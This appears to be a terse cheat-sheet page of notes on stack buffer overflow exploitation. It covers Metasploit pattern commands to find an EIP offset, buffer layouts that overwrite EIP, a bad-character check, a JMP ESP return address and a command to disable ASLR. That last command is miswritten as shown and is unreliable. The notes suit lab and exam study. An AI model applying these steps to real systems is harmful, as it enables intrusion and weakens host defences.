Buffer Overflow | Buf Exploitation
Last updated
Was this helpful?
Last updated
Was this helpful?
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337 where q is EIP value -> we will get offset OFFSET = 2003 buffer = "A" * 2003 + "B" * 4 EIP will be overwritten with 424242. badchars buffer = "A" * 2003 + "B" * 4 + badchars find out of place chars 0x625011af JMP ESP - FFE4 buffer = "A" * 2003 + "\xaf\x11\x50\x62" + overflow
ps -aux | grep {process} pid will be obtained
cat /proc/2678/maps
echo 0 > cat /proc/sys/kernel/randomize_va_space Configurations : 0 - Static 1 - Dynamic 2 - Smartly Dynamic